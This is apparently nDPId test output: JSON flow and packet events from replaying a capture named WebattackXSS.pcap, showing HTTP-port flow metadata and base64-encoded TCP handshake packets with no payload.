-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347329594,"flow_last_seen":1499347334709,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56036,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347329594,"flow_last_seen":1499347334709,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347332137,"flow_last_seen":1499347337710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56062,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347332137,"flow_last_seen":1499347337710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56062,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347333419,"flow_last_seen":1499347338710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56076,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347333419,"flow_last_seen":1499347338710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56076,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347334667,"flow_last_seen":1499347339710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56090,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347334667,"flow_last_seen":1499347339710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347455736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56090,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4073,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347456462,"flow_last_seen":1499347456462,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347456462,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4073,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":1,"flow_last_seen":1499347456462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347456462,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YWdAAD4GZGmsEAABwKgKMuAqAFCeBqRYAAAAAKACchB1sAAAAgQFtAQCCAoBOsU\/AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":2,"flow_last_seen":1499347456462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347456462,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4CoPzfb\/ngakWaAScSDVKAAAAgQFtAQCCAoD5Ja1ATrFPwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4075,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":3,"flow_last_seen":1499347456463,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347456463,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0YWhAAD4GZHCsEAABwKgKMuAqAFCeBqRZD833AIAQAOV0MAAAAQEICgE6xT8D5Ja1"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4085,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347457705,"flow_last_seen":1499347457705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347457705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4085,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":1,"flow_last_seen":1499347457705,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347457705,"pkt":"ABm5CmnxAMGxFOsxCABFAAA816NAAD4G7iysEAABwKgKMuA4AFCwfBHVAAAAAKACchD0eAAAAgQFtAQCCAoBOsZ2AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4086,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":2,"flow_last_seen":1499347457705,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347457705,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4DiBhHFpsHwR1qAScSBmmgAAAgQFtAQCCAoD5JfrATrGdgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4087,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":3,"flow_last_seen":1499347457706,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347457706,"pkt":"ABm5CmnxAMGxFOsxCABFAAA016RAAD4G7jOsEAABwKgKMuA4AFCwfBHWgYRxaoAQAOUFogAAAQEICgE6xnYD5Jfr"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4103,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347460253,"flow_last_seen":1499347460253,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347460253,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57426,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4103,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":1,"flow_last_seen":1499347460253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347460253,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eW5AAD4GTGKsEAABwKgKMuBSAFDnp7GdAAAAAKACchAa7gAAAgQFtAQCCAoBOsjzAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4104,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":2,"flow_last_seen":1499347460253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347460253,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4FLH4MUu56exnqAScSDwcAAAAgQFtAQCCAoD5JpoATrI8wEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4105,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":3,"flow_last_seen":1499347460254,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347460254,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eW9AAD4GTGmsEAABwKgKMuBSAFDnp7Gex+DFL4AQAOWPeAAAAQEICgE6yPMD5Jpo"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347461508,"flow_last_seen":1499347461508,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347461508,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":1,"flow_last_seen":1499347461508,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347461508,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80JNAAD4G9TysEAABwKgKMuBgAFDZtRq+AAAAAKACchC+dwAAAgQFtAQCCAoBOsotAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4116,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":2,"flow_last_seen":1499347461508,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347461508,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4GAaiodM2bUav6AScSB9+QAAAgQFtAQCCAoD5JuiATrKLQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":3,"flow_last_seen":1499347461509,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347461509,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00JRAAD4G9UOsEAABwKgKMuBgAFDZtRq\/GoqHTYAQAOUdAQAAAQEICgE6yi0D5Jui"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4130,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347462759,"flow_last_seen":1499347462759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347462759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4130,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":1,"flow_last_seen":1499347462759,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347462759,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8K55AAD4GmjKsEAABwKgKMuBuAFAjB+D7AAAAAKACchCtogAAAgQFtAQCCAoBOstlAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4131,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":2,"flow_last_seen":1499347462759,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347462759,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4G52KJeXIwfg\/KAScSAAAgAAAgQFtAQCCAoD5JzbATrLZQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4132,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":3,"flow_last_seen":1499347462760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347462760,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0K59AAD4GmjmsEAABwKgKMuBuAFAjB+D8diiXmIAQAOWfCAAAAQEICgE6y2YD5Jzb"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4145,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347465304,"flow_last_seen":1499347465304,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465304,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57480,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4145,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":1,"flow_last_seen":1499347465304,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347465304,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nSBAAD4GKLCsEAABwKgKMuCIAFBo61DCAAAAAKACchD1YAAAAgQFtAQCCAoBOs3iAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":2,"flow_last_seen":1499347465304,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347465304,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4Ijwu80MaOtQw6AScSCVOwAAAgQFtAQCCAoD5J9XATrN4gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4147,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":3,"flow_last_seen":1499347465305,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347465305,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nSFAAD4GKLesEAABwKgKMuCIAFBo61DD8LvNDYAQAOU0QwAAAQEICgE6zeID5J9X"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347337226,"flow_last_seen":1499347342710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56116,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347337226,"flow_last_seen":1499347342710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56116,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347338485,"flow_last_seen":1499347343711,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56130,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347338485,"flow_last_seen":1499347343711,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56130,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347339782,"flow_last_seen":1499347345712,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56144,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347339782,"flow_last_seen":1499347345712,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347341106,"flow_last_seen":1499347346712,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56158,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347341106,"flow_last_seen":1499347346712,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347342386,"flow_last_seen":1499347347713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56172,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347342386,"flow_last_seen":1499347347713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347343672,"flow_last_seen":1499347348713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56186,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347343672,"flow_last_seen":1499347348713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56186,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4157,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347466553,"flow_last_seen":1499347466553,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347466553,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4157,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":1,"flow_last_seen":1499347466553,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347466553,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8KvdAAD4GmtmsEAABwKgKMuCWAFD9ZuXtAAAAAKACchDKcwAAAgQFtAQCCAoBOs8aAAAAAAEDAwc="} 